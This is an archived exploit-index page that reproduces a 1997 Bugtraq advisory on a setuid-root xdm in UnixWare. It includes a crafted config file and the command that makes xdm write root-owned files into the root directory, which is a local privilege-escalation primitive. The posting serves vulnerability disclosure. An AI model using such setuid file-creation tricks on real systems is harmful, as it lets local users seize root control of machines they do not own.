xdm UNIX Ware exploit

Summary
Description:standard tempfile vulnerability in setuid root xdm on UNIX Ware systems with X, possibly others.
Author:Angel Ortiz <angelo@tawny.ssd.hcsc.com>
Compromise: root (local)
Vulnerable Systems:Systems with vulnerable xdm setuid (at least some UNIXware systems)
Date:2 January 1997
Notes:See addendum.
Details

Exploit:
See addendum.
Addendum:
Here is Angel Ortiz's original posting to Bugtraq: 

Date: Thu, 2 Jan 1997 17:25:18 -0500
From: Angel Ortiz 
To: Multiple recipients of list BUGTRAQ 
Subject: XDM bug

BUGTRAQRS:

**************************DISCLAIMER AND WARNING***********************

The following information is provided as information to users in order
to safeguard their systems.  Users using this exploit are totally
responsible for their actions
**********************************************************************

I hope the following has not been documented in the past.  If it has
been, my humble apologies.

Any way here is the problem.

System: UNIX Ware systems with X

Symptom:
/usr/X/bin/xdm is setuid

Exploit:
If you do a man on xdm you will see that there is a command line
option for a configuration file (-config).

xdm [-config config_file] [-nodaemon] [-debug debug_level]
                   [-error error_log_file]       [-resources resource_file]
                   [-server server_entry]

By default, xdm uses the /usr/lib/xdm/xdm-config file.  Out of
curiosity, if you copy this file to your home directory you will be
able to modify it and change where certain files are written to.
For example, here is a sample xdm-config file which can reside in your
home directory.

----------------------- Cut Here ------------------------------
#ident  "@(#)xdm:config/xdm-conf.cpp    1.12.1.9"
DisplayManager.companyLogoPixmap:   /usr/X/lib/pixmaps/Nlogo.xpm
DisplayManager.backgroundPixmap: /usr/X/lib/pixmaps/Npaper.xpm
DisplayManager.showMnemonic:    1
DisplayManager.errorLogFile:    /DANGEROUS-FILE
DisplayManager.pidFile:     /ALSO-DANGEROUS-FILE
DisplayManager.keyFile:     /usr/X/lib/xdm/xdm-keys
DisplayManager.servers:     /usr/X/lib/xdm/Xservers
DisplayManager._0.authorize:    true
DisplayManager*authComplain:    false
DisplayManager._0.setup:        /usr/X/lib/xdm/Xsetup_0
DisplayManager._0.terminateServer:  true
--------------------- Cut Here -------------------------------

Now, if you execute the following commands from a UNIX prompt:

xdm -config dangerous-xdm-config-file

You will create two files in the / directory.

Guess what they are.  Guess what can be done with such capabilities.

Any way, please verify xdm setuid on your systems and please let the
bugtraq news group know if it exists on other systems.

Regards,
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: